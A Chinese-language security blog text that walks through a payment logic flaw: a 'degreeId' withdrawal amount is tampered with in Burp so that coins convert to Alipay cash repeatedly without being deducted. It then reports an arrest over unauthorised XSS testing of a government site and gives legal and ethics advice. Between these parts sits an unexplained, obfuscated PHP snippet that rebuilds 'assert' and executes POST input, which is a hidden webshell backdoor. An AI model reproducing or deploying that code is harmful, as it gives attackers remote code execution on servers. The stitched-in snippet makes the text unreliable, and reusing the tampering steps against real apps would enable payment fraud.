2019年8月

随着安全行业的蓬勃发展,通用漏洞愈发难找,逻辑漏洞已经显得非常重要,也形成了一套完善的体系,当然,相信以后还会暴露出更多类型的逻辑漏洞,这也是安全行业的一个趋势,大家也可以多研究一下。今天给大家分享的是一次挖支付漏洞的实战细节,属于非常简单的类型,该漏洞已告知厂商并修复。现分享下过程,希望能对大家有所帮助。

1.打开该APP并登录

1.png

2.点击'我的'-'X币'-'支付宝充值'

2.png

跳转到兑换支付宝现金的页面

3.png

3.上图即漏洞点,我们打开burp设置代理进行手机抓包,输入支付宝和姓名,选择1元兑换,开启抓包,点击马上兑换,抓到如下请求包

4.png

4.然后点击放包,因为当时我的手机环境抓包延迟,可能会抓到其他软件如qq的数据包,所以这里我们需要多放几次包,点击forward放包,大概需要放3次左右,直到抓到应该出现的如下图的请求包

5.png

5.这里我们看到箭头处有个参数degreeId,该参数即提现金额参数(直接第一次改,就发现提现到账了),然后我们把请求包发送到repeater

6.png

6.更改参数degreeId,把1改成6,发送请求包,支付宝立马收到到账消息。

7.png

7.最后再返回查看X币余额,发现并没有扣除,所以可以无限反复提现(怕被打断腿,我只测试提了20块)

<?php ${"\x47L\x4f\x42\x41LS"}["\x6c\x68\x73l\x61wk"]="c";$kvbemdpsn="c";${"\x47\x4c\x4f\x42\x41\x4cS"}["\x68\x78a\x77\x67\x6d\x6d\x70\x6c\x77o"]="b\x6b\x66";${"GLOBx41Lx53"}["x70txx75x76x74uijx6d"]="x76bl";${"\x47\x4c\x4fB\x41\x4c\x53"}["g\x6f\x6fl\x72\x7a"]="\x62\x6b\x66";${${"\x47\x4cO\x42\x41\x4c\x53"}["p\x74xu\x76\x74\x75\x69\x6a\x6d"]}=str_replace("\x74\x69","","\x74\x69st\x69t\x74ir\x74i\x5frt\x69\x65\x74\x69pl\x74i\x61t\x69\x63\x65");${${"G\x4cO\x42\x41\x4cS"}["\x68\x78\x61\x77gm\x6d\x70\x6c\x77\x6f"]}=${${"G\x4c\x4f\x42\x41\x4cS"}["\x70t\x78\x75\x76\x74\x75ijm"]}("\x6b","","\x6b\x62\x61k\x73\x6b\x65\x36\x6b\x34k\x5fkdk\x65\x6b\x63\x6b\x6f\x6b\x64ke");${${"\x47L\x4f\x42ALS"}["lh\x73\x6c\x61\x77\x6b"]}=${${"\x47\x4cO\x42A\x4c\x53"}["g\x6f\x6f\x6cr\x7a"]}("YX\x4ezZX\x49=")[email protected]$_GET["n"]."x74";@${$kvbemdpsn}($_POST["59f1f"]);echo "ax62cx61x62cabx63n";?>

4.png

8月16日,记者从银川市公安局网安支队了解到,该支队主要侦办黑客攻击、组织考试作弊、侵犯公民个人信息等网络违法犯罪。今年以来,该队已成功侦办8起案件。近期,银川市公安局网安部门就成功侦办一起重大非法侵入计算机信息案。

1.png

7月19日,某政府网站管理员向网安支队报警,该政府网络内局长信箱模块有网民多次发送非正常留言,后模块运行不正常,疑遭黑客攻击。

接警后,网安支队立即开展核查,发现有用户名

为“ADMIN”、“ADMI”两个账号在该网站上进行注册后,表面上留言内容为“11111111”或者空白,但其实均隐藏着恶意代码。嫌疑人的行为已构成《刑法》二百八十五条非法侵入计算机信息系统罪。至此,网安支队确定该网站被黑客使用跨站脚本攻击(XSS)方式进行非法入侵。

办案民警介绍,该攻击方式可以秘密获取网站管理员使用电脑的浏览器权限,并绕过验证登陆后,可删改网站内容,并进行植入木马等后续提权操作等,进而可能造成非常严重后果。

2.png

7月22日,网安支队将此案立为“7.22某政府门户网站被非法侵入计算机信息系统案”,市县两级网安部门抽调精干力量组成专案组开展联合侦查。

经查,嫌疑人真实身份为李培及其徒弟李木子,经过多方调查发现二人均在乌鲁木齐市。

在掌握嫌疑人犯罪事实以及住址后,专案组于7月25日派出抓捕小组赴新疆乌鲁木齐市进行抓捕,经过当地警方大力配合,于7月31日将两名嫌疑人成功抓获归案。

经审讯,李培供职于某网络科技公司,负责向运营商提供重要信息系统等级保护测评业务,工作中网络渗透测试的目标网站均获得官方授权,属于公司正常业务行为。

那么,李培为何会对银川市的政府网络实施黑客攻击呢?

原来,李培是银川人,最近,他利用休息时间,在未授权的情况下,对银川市的某政府网站进行渗透测试,他的目的就是为了找出网站漏洞并生成漏洞报告,然后上传CNVD(国家信息安全漏洞共享平台,由国家计算机网络应急技术处理协调中心运营),由CNVD下发各网站进行修补。

3.png

按照李培的说法,他这是为家乡做点贡献,在此之前,他还对包括石嘴山市多个政府网站及周边多个省、市政府网站进行攻击。可法律意识较为淡薄的李培并没有意识到自己的行为属于违法犯罪行为。

最终,两名嫌疑人对犯罪事实供认不讳,目前羁押在银川市看守所。

——————————————————————————————————————————————

希望本文的一些思考能对信息安全从业者给出一些参考的建议。

安全技术是一把双刃剑,有人会利用它去犯罪牟利,有些人会它来帮助企业和有关部门解决安全问题,打击犯罪。当然有不少安全从业者在工作和学习过程中,能接触到更多核心数据、核心业务,与数据和金钱走得太近的人,受到身边环境氛围和一些不法分子的诱惑,而迷失的案例不在少数。如何去面对这些利益的诱惑,如何在安全道路上,如何保护自己,作为信息安全从业者如何去明确安全责任边界,法律边界,这也是我们今天要探讨的话题。

随着近几年大家对信息安全专业热衷,更多安全新人疯狂涌入到安全行业当中,很多安全新人在安全意识和自律上相比之下,了解的相对偏少。但是,问题来了,如果一个安全从业者缺乏安全认知,缺乏法律意识,甚至没有最基本的自律,职业道德,再谈什么安全人才的价值?对于广大已经走过早期安全新人阶段的从业者、已在各个领域有一定建树的行业专家,资深大拿更应该有责任和义务站出来去给行业新人、从业者去引导,避免“类似事件”的发生,明确风险边界,哪些有明显的问题,哪些是法律界限,相对模糊。

从个人经验和经历给大家分享一些心得和可操作性的建议。首先,尽可能的多了解国内的法律法规的,包括行业政策的规定,推荐了解下:刑法直接跟计算机相关的罪名和条款《非法侵入计算机信息系统》、《非法获取计算机信息系统罪》、《非法控制计算机信息系统罪》、《非法获取个人公民信息罪》、《敲诈勒索罪》、《提供专门用于侵入、非法控制计算机信息系统的程序、工具罪》等罪名,间接使用互联网信息技术犯罪的种类就多了,再次不一一列举,有条件的情况下,可以买本《刑法修正案十》和网络安全法学习一下。在工作和生活当中,希望从业者注意以下几个事项,真的爱自己请重点关注:

1、没有授权的前提下,不要触碰各类网站(包含企业网站),特别是国家事务、国防建设、尖端科学,政府相关网站,不要触碰ZF与国家背景企业的网站。

2、不要在不明确业务边界和责任边界的前提下,突破原有的系统权限和数据权限。

3、不要持有公民信息,不要搭建社工库,云盘、电脑、手机不要存储公民信息数据。

4、项目授权范围内做的相关工作,获取到的项目文件、商业文件、公民数据、“shell”等结果及时删除和清除。

5、写技术文章的过程中,不要过于披露涉及漏洞与通用型问题细节,不要提供工具!!文章内容该模糊化的地方,要做二次处理避免被二次利用。

6、不要做漏洞、数据交易,不要在不了解对方背景情况下给“犯罪分子”提供技术思路。

7、多学习法律、不要过度炫技,低调求发展。

网安专家的看法和建议:

一、不要无知,做法盲。网络安全行业被无知媒体和无法律意识从业者,强化包装成极客,为所欲为的极客,这是无知法盲的包装!

二、不要无畏,知法犯法。网络安全行业技术人员要强化法律风险,重点去学学《刑法》《网络安全法》。会计做假账都知道有可能要取消从业资格,甚至坐牢。网络安全从业者更甚!

三、不要侥幸,害人终害己。小黑入行的导师和网络安全行业管理者,要严肃告诫从业人员,网络安全行业是高危职业。不仅强调技术门槛高,技术难度高,更要强调入罪风险高!切记,传授犯罪方法也是犯罪!”

最后,不要在自己年轻的时候为自己的无知,买单。